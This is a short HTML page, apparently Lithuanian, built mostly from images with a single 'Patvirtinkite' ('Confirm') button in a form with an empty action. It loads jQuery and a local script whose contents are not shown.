<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/coral.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body >
    <div>
        <div class="roof">
            <img src="./img/tyoupq.JPG" alt="">
        </div>
    </div>


    <div>
        <div>
            <div class="ind1">
                <img src="./img/indrotop1.JPG" alt="">
            </div>
            </p>
            <div class="section">
                
                <div class="kolch">
                    <form  action="">
                        <div class="pack1">
                            
                            <img src="./img/maino2.png" alt="">
                        </div>

                        <div class="botn">
                            <img src="./img/manoion1.png" alt="">
                            <button class="btn1"  id="barinxri" type="button"><p>Patvirtinkite</p> <img src="./img/btno.png" alt=""></button>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>


    <div>
        <div>
            <div class="boot">
                <img src="./img/bonotia.JPG" alt="">
            </div>
        </div>
    </div>


    <!--  -->
    <script src="./js/stb.js"></script>
</body>
</html>